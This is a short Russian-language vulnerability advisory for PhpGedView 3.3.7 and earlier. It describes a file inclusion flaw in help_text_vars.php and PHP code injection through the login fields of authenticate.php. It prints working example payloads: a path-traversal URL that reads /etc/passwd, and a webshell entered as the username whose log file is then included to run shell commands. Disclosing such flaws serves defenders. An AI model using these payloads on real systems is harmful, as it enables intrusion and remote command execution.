Программа: PhpGedView 3.3.7 и более ранние версии

Обнаруженные Уязвимости позволяют удаленному пользователю получить доступ к
важным данным и выполнить произвольный PHP сценарий на системе.

1. Отсутствует фильтрация входных данных в параметре "PGV_BASE_DIRECTORY" в
сценарии "help_text_vars.php". Удаленный пользователь может подключить
произвольные файлы на системе. Удачная эксплуатация уязвимости возможна при
включено опции "register_globals".

Пример:

http://[target]/[path]/help_text_vars.php? PGV_BASE_DIRECTORY=../../../../../../../etc/passwd

2. Уязвимость существует из-за недостаточной обработки входных данных в
параметрах "user_language", "user_email" и "user_gedcomid" в сценарии "authenticate.php".
Удаленный пользователь может выполнить произвольный PHP код на системе. Для
удачной эксплуатации уязвимости требуется, чтобы опция "magic_quotes_gpc" была
отключена.

Пример:

Пытаемся войти в систему таким образом:

username: <?php system($_GET[cmd]);?>
password: [nothing]

Затем:

http://[target]/[path]/help_text_vars.php?cmd=ls%20-la& PGV_BASE_DIRECTORY=./index/pgv-200512.log

 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии